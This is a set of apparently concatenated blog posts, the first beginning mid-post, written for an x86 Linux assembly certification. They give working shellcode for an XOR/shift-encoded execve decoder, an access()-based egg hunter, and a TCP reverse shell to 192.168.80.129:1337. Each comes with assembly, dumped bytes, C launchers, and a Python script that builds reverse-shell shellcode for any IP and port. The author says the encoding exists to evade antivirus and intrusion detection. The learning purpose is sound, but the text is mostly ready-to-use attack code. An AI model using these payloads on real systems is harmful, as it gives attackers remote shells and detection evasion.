Original Shellcode: 0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x87, 0xdc, 0xb0, 0x0b, 0xcd, 0x80,

Encoded Shellcode : 0x545, 0x4a3, 0x583, 0x5d3, 0x541, 0x541, 0x439, 0x5d3, 0x5d3, 0x541, 0x5e7, 0x5d5, 0x5cf, 0x411, 0x4eb, 0x443, 0x509, 0x48d, 0x423, 0x539

ihack4falafel@ubuntu:~$

Decoder

Now comes the decoding part, let’s write code that basically takes encoded shellcode produced earlier , decode it in reverse order and then execute

global _start

section .text

_start:
    ;
    ; [ROT-N + SHL-N + XOR-N] encoded execve() code block
    ;
    jmp short call_decoder       ; jump to call_decoder to save encoded_shellcode pointer to ESI
	
decoder:

    pop esi                      ; store encoded_shellcode pointer in ESI
    push esi                     ; push encoded_shellcode pointer to stack for later execution
    mov edi, esi                 ; move encoded_shellcode pointer to EDI

decode:
    ;
    ; note: 1) Make sure ROT, SHR, and XOR here match your encoder.py input.
    ;       2) Hence we're limited by the size of encoded_shellcode (word),
    ;          SHR is limited to <1-8> bits. Feel free to upgrade size to DW 
    ;          to allow up to 16-bits shift if need be.
    ;
    mov ax, [esi]                ; move current word from encoded_shellcode to AX
    xor ax, 0x539                ; XOR encoded_shellcode with 1337, one word at a time  
    jz decoded_shellcode         ; if zero jump to decoded_shellcode
    shr ax, 1                    ; shift encoded_shellcode to right by one bit, one word at a time	
    sub ax, 13                   ; substract 13 from encoded_shellcode, one word at a time
    mov [edi], al                ; move decoded byte to EDI	
    inc esi                      ; point to the next encoded_shellcode word
    inc esi
    inc edi                      ; point to the next decoded_shellcode byte
    jmp short decode             ; jump to decode and repeat the decoding process for the next word!

decoded_shellcode:
    call [esp]                   ; execute decoded_shellcode

call_decoder:
    call decoder
    encoded_shellcode: dw 0x545, 0x4a3, 0x583, 0x5d3, 0x541, 0x541, 0x439, 0x5d3, 0x5d3, 0x541, 0x5e7, 0x5d5, 0x5cf, 0x411, 0x4eb, 0x443, 0x509, 0x48d, 0x423, 0x539

global _start

section .text

_start:

;

; [ROT-N + SHL-N + XOR-N] encoded execve() code block

;

jmp short call_decoder ; jump to call_decoder to save encoded_shellcode pointer to ESI

decoder:

pop esi ; store encoded_shellcode pointer in ESI

push esi ; push encoded_shellcode pointer to stack for later execution

mov edi, esi ; move encoded_shellcode pointer to EDI

decode:

;

; note: 1) Make sure ROT, SHR, and XOR here match your encoder.py input.

; 2) Hence we're limited by the size of encoded_shellcode (word),

; SHR is limited to <1-8> bits. Feel free to upgrade size to DW

; to allow up to 16-bits shift if need be.

;

mov ax, [esi] ; move current word from encoded_shellcode to AX

xor ax, 0x539 ; XOR encoded_shellcode with 1337, one word at a time

jz decoded_shellcode ; if zero jump to decoded_shellcode

shr ax, 1 ; shift encoded_shellcode to right by one bit, one word at a time

sub ax, 13 ; substract 13 from encoded_shellcode, one word at a time

mov [edi], al ; move decoded byte to EDI

inc esi ; point to the next encoded_shellcode word

inc esi

inc edi ; point to the next decoded_shellcode byte

jmp short decode ; jump to decode and repeat the decoding process for the next word!

decoded_shellcode:

call [esp] ; execute decoded_shellcode

call_decoder:

call decoder

encoded_shellcode: dw 0x545, 0x4a3, 0x583, 0x5d3, 0x541, 0x541, 0x439, 0x5d3, 0x5d3, 0x541, 0x5e7, 0x5d5, 0x5cf, 0x411, 0x4eb, 0x443, 0x509, 0x48d, 0x423, 0x539

Compile and dump shellcode

ihack4falafel@ubuntu:~# nasm -f elf32 -o Decoder.o Decoder.nasm 
ihack4falafel@ubuntu:~# ld -z execstack -o Decoder Decoder.o
ihack4falafel@ubuntu:~# objdump -d ./Decoder|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\xeb\x1e\x5e\x56\x89\xf7\x66\x8b\x06\x66\x35\x39\x05\x74\x0e\x66\xd1\xe8\x66\x83\xe8\x0d\x88\x07\x46\x46\x47\xeb\xe9\xff\x14\x24\xe8\xdd\xff\xff\xff\x45\x05\xa3\x04\x83\x05\xd3\x05\x41\x05\x41\x05\x39\x04\xd3\x05\xd3\x05\x41\x05\xe7\x05\xd5\x05\xcf\x05\x11\x04\xeb\x04\x43\x04\x09\x05\x8d\x04\x23\x04\x39\x05"
ihack4falafel@ubuntu:~#

ihack4falafel@ubuntu:~# nasm -f elf32 -o Decoder.o Decoder.nasm

ihack4falafel@ubuntu:~# ld -z execstack -o Decoder Decoder.o

"\xeb\x1e\x5e\x56\x89\xf7\x66\x8b\x06\x66\x35\x39\x05\x74\x0e\x66\xd1\xe8\x66\x83\xe8\x0d\x88\x07\x46\x46\x47\xeb\xe9\xff\x14\x24\xe8\xdd\xff\xff\xff\x45\x05\xa3\x04\x83\x05\xd3\x05\x41\x05\x41\x05\x39\x04\xd3\x05\xd3\x05\x41\x05\xe7\x05\xd5\x05\xcf\x05\x11\x04\xeb\x04\x43\x04\x09\x05\x8d\x04\x23\x04\x39\x05"

ihack4falafel@ubuntu:~#

Add it to final exploit

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\xeb\x1e\x5e\x56\x89\xf7\x66\x8b\x06\x66\x35\x39\x05\x74\x0e\x66\xd1\xe8\x66\x83\xe8\x0d\x88\x07\x46\x46\x47\xeb\xe9\xff\x14\x24\xe8\xdd\xff\xff\xff\x45\x05\xa3\x04\x83\x05\xd3\x05\x41\x05\x41\x05\x39\x04\xd3\x05\xd3\x05\x41\x05\xe7\x05\xd5\x05\xcf\x05\x11\x04\xeb\x04\x43\x04\x09\x05\x8d\x04\x23\x04\x39\x05";

void main()
{

	printf("Shellcode Length:  %d\n", strlen(code));

	int (*ret)() = (int(*)())code;

	ret();

}

#include<stdio.h>

#include<string.h>

unsigned char code[] = \

void main()

{

printf("Shellcode Length: %d\n", strlen(code));

int (*ret)() = (int(*)())code;

ret();

}

Demo time

Closing Thoughts

I believe learning shellcode encoding is vital to exploit development, in order to evade modern anti-viruses and/or intrusion detection/prevention systems. Please note all of the code in this post were tested on Ubuntu 12.04.5 LTS. Feel free to contact me for questions using the comment section below or just tweet me @ihack4falafel .

This blog post has been created for completing the requirements of the SecurityTube Linux
Assembly Expert certification:

http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-1115

Github Repo: https://github.com/ihack4falafel/SLAE32/tree/master/Assignment%204

Egg Hunter for The Win | Linux x86

Introduction

What is egg hunter? and why on earth would you need it? This post will answer these questions and discuss access() syscall, which will be a vital part of our shellcode. The post will then conclude by demoing a working egg hunter shellcode. Please note all of the work here is based off of Skape’s paper.

Egg Hunting

Egg hunting is a technique used to search Virtual Address Space (VAS) for pattern referred to by Egg that usually marks the start of our desired payload. Now you would probably be asking what if we hit an unallocated memory while searching for that pattern? Well, the answer is the process will SIGSEGV leading to a crash! To prevent this kind of behavior we will abuse access() syscall to hunt for our egg without crashing (more on that later). A good example of egg hunter use case is buffer overflow exploit with limited buffer size that won’t allow for large payloads such as bind or reverse shell, so we use egg hunter as stager to capture and execute payload of our chosen.

access()

access() syscall is used to check what permissions the calling process has to a file referred to by pathname, and it consist of two arguments as shown below

int access(const char *pathname, int mode);

1	int access(const char *pathname, int mode);

Two reasons you’d want to use access() syscall, the first being it doesn’t have lots of arguments thus less registers to initialize, which translate to smaller size. The second reason is we’re looking for function that doesn’t write to the pointer, cause that will defeat the purpose. We’ll use pathname pointer to preform address validation by observing the ZF flag, when the pointer hits unallocated memory it will return EFAULT, meaning hey this memory page is bad try the next one. Let’s identify access() ID “EAX”

root@falafel:~# cat /usr/include/i386-linux-gnu/asm/unistd_32.h | grep access
#define __NR_access      33
#define __NR_faccessat  307
root@falafel:~#

root@falafel:~# cat /usr/include/i386-linux-gnu/asm/unistd_32.h | grep access

#define __NR_access 33

#define __NR_faccessat 307

root@falafel:~#

Also its worth noting that we’ll need to repeat our egg twice (8 bytes) to avoid collision of egg hunter with itself, so the egg hunter will have to have two matches before it jumps to payload.

Final Shellcode

Now that we know what egg hunter and access() does, let’s write egg hunter code and then test it!

global _start
 
section .text
 
_start:

    ; 
    ; access(2) code block
    ;
    cld                   ; make sure direction flag is NOT set
    xor edx,edx           ; initialize EDX register

nxt_page:                 ; increment page
    or dx,0xfff           ; first page alignment

nxt_addr:
    inc edx               ; increment address
    lea ebx,[edx+0x4]     ; load pointer with 8-bytes egg hunter
    push byte 0x21        ; #define __NR_access 33
    pop eax               ; load EAX
    int 0x80              ; ping kernel!
    cmp al,0xf2           ; check for EFAULT
    jz nxt_page           ; if yes go back to nxt_page
    mov eax,0x776f6f74    ; egg = woot
    mov edi,edx           ; save pointer address to EDI
    scasd                 ; compare EAX[woot] with EDI[????] first 4 bytes  
    jnz nxt_addr          ; if no go back to nxt_addr
    scasd                 ; compare EAX[woot] with EDI+4[????] second 4 bytes
    jnz nxt_addr          ; if no go back to nxt_addr
    jmp edi               ; go to the start of our shellcode

global _start

section .text

_start:

;

; access(2) code block

;

cld ; make sure direction flag is NOT set

xor edx,edx ; initialize EDX register

nxt_page: ; increment page

or dx,0xfff ; first page alignment

nxt_addr:

inc edx ; increment address

lea ebx,[edx+0x4] ; load pointer with 8-bytes egg hunter

push byte 0x21 ; #define __NR_access 33

pop eax ; load EAX

int 0x80 ; ping kernel!

cmp al,0xf2 ; check for EFAULT

jz nxt_page ; if yes go back to nxt_page

mov eax,0x776f6f74 ; egg = woot

mov edi,edx ; save pointer address to EDI

scasd ; compare EAX[woot] with EDI[????] first 4 bytes

jnz nxt_addr ; if no go back to nxt_addr

scasd ; compare EAX[woot] with EDI+4[????] second 4 bytes

jnz nxt_addr ; if no go back to nxt_addr

jmp edi ; go to the start of our shellcode

Let’s compile and dump shellcode!

falafel@ubuntu:~$ nasm -f elf32 -o EggHunter.o EggHunter.nasm 
falafel@ubuntu:~$ ld -z execstack -o EggHunter EggHunter.o
falafel@ubuntu:~$ objdump -d ./EggHunter|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\xfc\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58\xcd\x80\x3c\xf2\x74\xee\xb8\x74\x6f\x6f\x77\x89\xd7\xaf\x75\xe9\xaf\x75\xe6\xff\xe7"
falafel@ubuntu:~$

falafel@ubuntu:~$ nasm -f elf32 -o EggHunter.o EggHunter.nasm

falafel@ubuntu:~$ ld -z execstack -o EggHunter EggHunter.o

"\xfc\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58\xcd\x80\x3c\xf2\x74\xee\xb8\x74\x6f\x6f\x77\x89\xd7\xaf\x75\xe9\xaf\x75\xe6\xff\xe7"

falafel@ubuntu:~$

Here’s the final egg hunter shellcode coupled with “/bin/dash” from exploit-db

#include<stdio.h>
#include<string.h>

unsigned char egghunter[]= \
"\xfc\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58\xcd\x80\x3c\xf2\x74\xee\xb8\x74\x6f\x6f\x77\x89\xd7\xaf\x75\xe9\xaf\x75\xe6\xff\xe7";

unsigned char shellcode[] = \
/** wootwoot **/
"\x74\x6f\x6f\x77\x74\x6f\x6f\x77"
/** shellcode from https://www.exploit-db.com/exploits/43476/ **/
"\x31\xc0\x50\x68\x64\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";


int main(){

     printf("Egghunter Length:  %d\n", strlen(egghunter));
     printf("Shellcode Length:  %d\n", strlen(shellcode));


     (*(void  (*)()) egghunter)();
     return 0;
}

#include<stdio.h>

#include<string.h>

unsigned char egghunter[]= \

"\xfc\x31\xd2\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x6a\x21\x58\xcd\x80\x3c\xf2\x74\xee\xb8\x74\x6f\x6f\x77\x89\xd7\xaf\x75\xe9\xaf\x75\xe6\xff\xe7";

unsigned char shellcode[] = \

/** wootwoot **/

"\x74\x6f\x6f\x77\x74\x6f\x6f\x77"

/** shellcode from https://www.exploit-db.com/exploits/43476/ **/

"\x31\xc0\x50\x68\x64\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";

int main(){

printf("Egghunter Length: %d\n", strlen(egghunter));

printf("Shellcode Length: %d\n", strlen(shellcode));

(*(void (*)()) egghunter)();

return 0;

}

Demo time!

Closing Thoughts

I don’t know about you but I find egg hunter method really fascinating and I’m glad I learned how to write my own! Thank you Skape for your awesome work! Feel free to contact me for questions using the comment section below or just tweet me @ihack4falafel . All of the code is available on on my github as shown in the link below.

This blog post has been created for completing the requirements of the SecurityTube Linux
Assembly Expert certification:

http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-1115

Github Repo: https://github.com/ihack4falafel/SLAE32/tree/master/Assignment%203

Creating Custom TCP Reverse Shell | Linux x86

Introduction

Reverse TCP shell consist of three syscalls, one for setting up socket that includes socket(), connect() functions. The second syscall is dup2() for file descriptors, and the last syscall execve() is used to spawn shell upon successful TCP connection. Please note that most of the functions mentioned here have already been covered in my previous blog post TCP Bind, hence this post will only focus on connect() function, which is the main difference between bind and reverse shell! The post will then conclude by tying all the pieces together to create working shellcode.

socket()

socket() is used to create medium for communication, for more information on this function please refer to TCP Bind blog post. let’s code!

global _start

section .text

_start:
 
    ; zero out registers
    xor eax, eax 
    xor ebx, ebx
    xor edx, edx
    xor esi, esi

    ; 
    ; socket() code block
    ;

    ; push NULL for protocol type
    push eax

    ; __NR_socketcall 102
    mov al, 0x66

    ; #define SYS_SOCKET 1
    inc bl

    ; push 1 for SOCK_STREAM
    push byte 0x1

    ; push 2 for AF_INET
    push byte 0x2

    ; store arguments in ECX, ping kernel!
    mov ecx, esp
    int 0x80

global _start

section .text

_start:

; zero out registers

xor eax, eax

xor ebx, ebx

xor edx, edx

xor esi, esi

;

; socket() code block

;

; push NULL for protocol type

push eax

; __NR_socketcall 102

mov al, 0x66

; #define SYS_SOCKET 1

inc bl

; push 1 for SOCK_STREAM

push byte 0x1

; push 2 for AF_INET

push byte 0x2

; store arguments in ECX, ping kernel!

mov ecx, esp

int 0x80

connect()

This is where we’re going to spend most of our time, connect() function basically connect a socket referred to by sockfd file descriptor to an address specified by addr, and it consist of three arguments as shown below

int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);

1	int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);

sockfd is used to point to socket() created earlier, hence we will save its address to “ESI”. addr is where we specify our desired IP address and it’s broken down to three parts as shown below

struct sockaddr_in {
               sa_family_t    sin_family; /* address family: AF_INET */
               in_port_t      sin_port;   /* port in network byte order */
               struct in_addr sin_addr;   /* internet address */
           };

struct sockaddr_in {

sa_family_t sin_family; /* address family: AF_INET */

in_port_t sin_port; /* port in network byte order */

struct in_addr sin_addr; /* internet address */

};

Now sin_family is pretty self-explanatory so will go with “AF_INET”, which according to the first code block in socket() translates to “2”. Also we’ll go with “1337” for sin_port and “192.168.80.129” for sin_addr both values needs to be pushed in network byte order “big-endian”, and here’s why RFC1700. The last argument would be addrlen which defines the size of addr in bytes, “16” in our case. Let’s identify ID for connect() function “EBX”

root@falafel:~$ cat /usr/include/linux/net.h | grep SYS_CONNECT
#define SYS_CONNECT	3		/* sys_connect(2)		*/
root@falafel:~$

root@falafel:~$ cat /usr/include/linux/net.h | grep SYS_CONNECT

#define SYS_CONNECT 3 /* sys_connect(2) */

root@falafel:~$

Back to the terminal

    ; 
    ; connect() code block
    ; 

    ; move sockfd to ESI
    mov esi, eax

    ; __NR_socketcall 102
    mov al, 0x66

    ; #define SYS_CONNECT 3
    pop ebx
    inc ebx
    pop edi

    ; push 192.168.80.129 for sin_addr
    push 0x8150a8c0

    ; push 1337 for sin_port
    push word 0x3905

    ; push 2 for sin_family
    push word 0x2

    ; push 16 for socketlen_t
    push byte 16

    ; store ESP pointer (sockaddr) in ECX
    push ecx

    ; push ESI for sockfd
    push esi

    ; save arguments pointer to ECX, ping kernel!
    mov ecx, esp
    int 0x80

;

; connect() code block

;

; move sockfd to ESI

mov esi, eax

; __NR_socketcall 102

mov al, 0x66

; #define SYS_CONNECT 3

pop ebx

inc ebx

pop edi

; push 192.168.80.129 for sin_addr

push 0x8150a8c0

; push 1337 for sin_port

push word 0x3905

; push 2 for sin_family

push word 0x2

; push 16 for socketlen_t

push byte 16

; store ESP pointer (sockaddr) in ECX

push ecx

; push ESI for sockfd

push esi

; save arguments pointer to ECX, ping kernel!

mov ecx, esp

int 0x80

dup2()

dup2() is used to duplicate file descriptors, for more information on this function please refer to TCP Bind blog post. some more code!

    ;
    ;dup2() code block
    ; 

    ; store sockfd in EBX
    xchg esi, ebx

    ; reset ECX for newfd loop
    xor ecx, ecx

    ; set counter to 2
    add cl, 0x2

    ; loop for stdin, stdout, and stderr
    ; syscall for __NR_dup2 63
    ; ping kernel 3 times!

dup:
    mov al, 0x3f
    int 0x80
    dec cl
    jns dup

;

;dup2() code block

;

; store sockfd in EBX

xchg esi, ebx

; reset ECX for newfd loop

xor ecx, ecx

; set counter to 2

add cl, 0x2

; loop for stdin, stdout, and stderr

; syscall for __NR_dup2 63

; ping kernel 3 times!

dup:

mov al, 0x3f

int 0x80

dec cl

jns dup

execve()

execve() is used to execute a program, for more information on this function please refer to TCP Bind blog post

    ;
    ;execve() code block
    ;

    ; push NULL followed by "/bin//sh" for filename
    push eax
    push 0x68732f2f
    push 0x6e69622f

    ; store ESP pointer to "/bin//sh" in EBX
    mov ebx, esp

    ; save arguments pointer to ECX
    push eax
    mov edx, esp
    push ebx
    mov ecx, esp

    ;__NR_execve 11, ping kernel!
    mov al, 0xb
    int 0x80

;

;execve() code block

;

; push NULL followed by "/bin//sh" for filename

push eax

push 0x68732f2f

push 0x6e69622f

; store ESP pointer to "/bin//sh" in EBX

mov ebx, esp

; save arguments pointer to ECX

push eax

mov edx, esp

push ebx

mov ecx, esp

;__NR_execve 11, ping kernel!

mov al, 0xb

int 0x80

Final Shellcode

Now that we have all the pieces of the puzzle, let’s compile and test and then create python script that takes an IP address and port number and add it to our custom shellcode, here’s final code

global _start

section .text

_start:
 
    ; zero out registers
    xor eax, eax 
    xor ebx, ebx
    xor edx, edx
    xor esi, esi

    ; 
    ; socket() code block
    ;

    ; push NULL for protocol type
    push eax

    ; __NR_socketcall 102
    mov al, 0x66

    ; #define SYS_SOCKET 1
    inc bl

    ; push 1 for SOCK_STREAM
    push byte 0x1

    ; push 2 for AF_INET
    push byte 0x2

    ; store arguments in ECX, ping kernel!
    mov ecx, esp
    int 0x80

    ; 
    ; connect() code block
    ; 

    ; move sockfd to ESI
    mov esi, eax

    ; __NR_socketcall 102
    mov al, 0x66

    ; #define SYS_CONNECT 3
    pop ebx
    inc ebx
    pop edi

    ; push 192.168.80.129 for sin_addr
    push 0x8150a8c0

    ; push 1337 for sin_port
    push word 0x3905

    ; push 2 for sin_family
    push word 0x2

    ; push 16 for socketlen_t
    push byte 16

    ; store ESP pointer (sockaddr) in ECX
    push ecx

    ; push ESI for sockfd
    push esi

    ; save arguments pointer to ECX, ping kernel!
    mov ecx, esp
    int 0x80

    ;
    ;dup2() code block
    ; 

    ; store sockfd in EBX
    xchg esi, ebx

    ; reset ECX for newfd loop
    xor ecx, ecx

    ; set counter to 2
    add cl, 0x2

    ; loop for stdin, stdout, and stderr
    ; syscall for __NR_dup2 63
    ; ping kernel 3 times!

dup:
    mov al, 0x3f
    int 0x80
    dec cl
    jns dup

    ;
    ;execve() code block
    ;

    ; push NULL followed by "/bin//sh" for filename
    push eax
    push 0x68732f2f
    push 0x6e69622f

    ; store ESP pointer to "/bin//sh" in EBX
    mov ebx, esp

    ; save arguments pointer to ECX
    push eax
    mov edx, esp
    push ebx
    mov ecx, esp

    ;__NR_execve 11, ping kernel!
    mov al, 0xb
    int 0x80

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

global _start

section .text

_start:

; zero out registers

xor eax, eax

xor ebx, ebx

xor edx, edx

xor esi, esi

;

; socket() code block

;

; push NULL for protocol type

push eax

; __NR_socketcall 102

mov al, 0x66

; #define SYS_SOCKET 1

inc bl

; push 1 for SOCK_STREAM

push byte 0x1

; push 2 for AF_INET

push byte 0x2

; store arguments in ECX, ping kernel!

mov ecx, esp

int 0x80

;

; connect() code block

;

; move sockfd to ESI

mov esi, eax

; __NR_socketcall 102

mov al, 0x66

; #define SYS_CONNECT 3

pop ebx

inc ebx

pop edi

; push 192.168.80.129 for sin_addr

push 0x8150a8c0

; push 1337 for sin_port

push word 0x3905

; push 2 for sin_family

push word 0x2

; push 16 for socketlen_t

push byte 16

; store ESP pointer (sockaddr) in ECX

push ecx

; push ESI for sockfd

push esi

; save arguments pointer to ECX, ping kernel!

mov ecx, esp

int 0x80

;

;dup2() code block

;

; store sockfd in EBX

xchg esi, ebx

; reset ECX for newfd loop

xor ecx, ecx

; set counter to 2

add cl, 0x2

; loop for stdin, stdout, and stderr

; syscall for __NR_dup2 63

; ping kernel 3 times!

dup:

mov al, 0x3f

int 0x80

dec cl

jns dup

;

;execve() code block

;

; push NULL followed by "/bin//sh" for filename

push eax

push 0x68732f2f

push 0x6e69622f

; store ESP pointer to "/bin//sh" in EBX

mov ebx, esp

; save arguments pointer to ECX

push eax

mov edx, esp

push ebx

mov ecx, esp

;__NR_execve 11, ping kernel!

mov al, 0xb

int 0x80

Here’s graphical version of it

Demo time!

Let’s dump shellcode and then use it to create python script

ihack4falafel@ubuntu:~$ objdump -d ./ReverseShell|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x31\xc0\x31\xdb\x31\xd2\x31\xf6\x50\xb0\x66\xfe\xc3\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x5b\x43\x5f\x68\xc0\xa8\x50\x81\x66\x68\x05\x39\x66\x6a\x02\x6a\x10\x51\x56\x89\xe1\xcd\x80\x87\xf3\x31\xc9\x80\xc1\x02\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
ihack4falafel@ubuntu:~$

"\x31\xc0\x31\xdb\x31\xd2\x31\xf6\x50\xb0\x66\xfe\xc3\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x5b\x43\x5f\x68\xc0\xa8\x50\x81\x66\x68\x05\x39\x66\x6a\x02\x6a\x10\x51\x56\x89\xe1\xcd\x80\x87\xf3\x31\xc9\x80\xc1\x02\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

ihack4falafel@ubuntu:~$

Here’s the script

#!/usr/bin/python
#---------------------------------------------------------------------------------------------#
# Script        = ReverseShell.py                                                             #
# SLAE-ID       = SLAE-1115                                                                   #
# Description   = Custom Reverse Shell with configurable ip and port                          #
# Date          = 1/16/2018                                                                   #
# Author        = @ihack4falafel                                                              #
# Usage         = python ReverseShell.py <ip> <port>                                          #
#---------------------------------------------------------------------------------------------#

import sys

#---------------#---------#
W  = '\033[0m'  # White   #
P  = '\033[35m' # Purple  #
Y  = '\033[33m' # Yellow  #
#---------------#---------#

# Check ip and port input
if len(sys.argv) < 3:
  print Y+ "Usage               :" + P+  " python BindShell.py <ip> <port>               " +W
  print Y+ "Example             :" + P+  " python BindShell.py 192.168.80.129 1337       " +W
  sys.exit(0)

ip = sys.argv[1]
port = int(sys.argv[2])

# Make sure port is good!
if port < 1 or port > 65535:
  print P+ "Please specify port number between 1 and 65535" +W
  exit()

if port <= 1024:
  print P+ "This port require root privileges!" +W

# Change port to Shellcode 
port_shellcode = format(port, '04x')
port_shellcode = "\\x" + str(port_shellcode[0:2]) + "\\x" + str(port_shellcode[2:4])  

# Change ip to Shellcode
octet1, octet2, octet3, octet4 = ip.split('.')
ip_shellcode = "\\x" + format(int(octet1), '02x') + "\\x" + format(int(octet2), '02x') + "\\x" + format(int(octet3), '02x') + "\\x" + format(int(octet4), '02x')

# Print final Shellcode, and highlight ip and port in yellow ;)
print P+ "\\x31\\xc0\\x31\\xdb\\x31\\xd2\\x31\\xf6\\x50\\xb0\\x66\\xfe\\xc3\\x6a\\x01\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x89\\xc6\\xb0\\x66\\x5b\\x43\\x5f\\x68" + Y+ ip_shellcode + P+ "\\x66\\x68" + Y+ port_shellcode + P+ "\\x66\\x6a\\x02\\x6a\\x10\\x51\\x56\\x89\\xe1\\xcd\\x80\\x87\\xf3\\x31\\xc9\\x80\\xc1\\x02\\xb0\\x3f\\xcd\\x80\\xfe\\xc9\\x79\\xf8\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x89\\xe2\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80" +W

#!/usr/bin/python

#---------------------------------------------------------------------------------------------#

# Script = ReverseShell.py #

# SLAE-ID = SLAE-1115 #

# Description = Custom Reverse Shell with configurable ip and port #

# Date = 1/16/2018 #

# Author = @ihack4falafel #

# Usage = python ReverseShell.py <ip> <port> #

#---------------------------------------------------------------------------------------------#

import sys

#---------------#---------#

W = '\033[0m' # White #

P = '\033[35m' # Purple #

Y = '\033[33m' # Yellow #

#---------------#---------#

# Check ip and port input

if len(sys.argv) < 3:

print Y+ "Usage :" + P+ " python BindShell.py <ip> <port> " +W

print Y+ "Example :" + P+ " python BindShell.py 192.168.80.129 1337 " +W

sys.exit(0)

ip = sys.argv[1]

port = int(sys.argv[2])

# Make sure port is good!

if port < 1 or port > 65535:

print P+ "Please specify port number between 1 and 65535" +W

exit()

if port <= 1024:

print P+ "This port require root privileges!" +W

# Change port to Shellcode

port_shellcode = format(port, '04x')

port_shellcode = "\\x" + str(port_shellcode[0:2]) + "\\x" + str(port_shellcode[2:4])

# Change ip to Shellcode

octet1, octet2, octet3, octet4 = ip.split('.')

ip_shellcode = "\\x" + format(int(octet1), '02x') + "\\x" + format(int(octet2), '02x') + "\\x" + format(int(octet3), '02x') + "\\x" + format(int(octet4), '02x')

# Print final Shellcode, and highlight ip and port in yellow ;)

print P+ "\\x31\\xc0\\x31\\xdb\\x31\\xd2\\x31\\xf6\\x50\\xb0\\x66\\xfe\\xc3\\x6a\\x01\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x89\\xc6\\xb0\\x66\\x5b\\x43\\x5f\\x68" + Y+ ip_shellcode + P+ "\\x66\\x68" + Y+ port_shellcode + P+ "\\x66\\x6a\\x02\\x6a\\x10\\x51\\x56\\x89\\xe1\\xcd\\x80\\x87\\xf3\\x31\\xc9\\x80\\xc1\\x02\\xb0\\x3f\\xcd\\x80\\xfe\\xc9\\x79\\xf8\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x89\\xe2\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80" +W

Running the script with same ip address and port will output exact same shellcode generated earlier!

ihack4falafel@ubuntu:~$ python ReverseShell.py 192.168.80.129 1337
\x31\xc0\x31\xdb\x31\xd2\x31\xf6\x50\xb0\x66\xfe\xc3\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x5b\x43\x5f\x68\xc0\xa8\x50\x81\x66\x68\x05\x39\x66\x6a\x02\x6a\x10\x51\x56\x89\xe1\xcd\x80\x87\xf3\x31\xc9\x80\xc1\x02\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
ihack4falafel@ubuntu:~$

ihack4falafel@ubuntu:~$ python ReverseShell.py 192.168.80.129 1337

\x31\xc0\x31\xdb\x31\xd2\x31\xf6\x50\xb0\x66\xfe\xc3\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x5b\x43\x5f\x68\xc0\xa8\x50\x81\x66\x68\x05\x39\x66\x6a\x02\x6a\x10\x51\x56\x89\xe1\xcd\x80\x87\xf3\x31\xc9\x80\xc1\x02\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80

ihack4falafel@ubuntu:~$

Closing Thoughts

This post is continuation of TCP Bind one, hence did not have much information outside what we’ve already learned. Feel free to contact me for questions using the comment section below or just tweet me @ihack4falafel . All of the code is available on on my github as shown in the link below. Hope this post has been a good resource and I’d like to thank you for viewing!

This blog post has been created for completing the requirements of the SecurityTube Linux
Assembly Expert certification:

http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-1115

Github Repo: https://github.com/ihack4falafel/SLAE32/tree/master/Assignment%202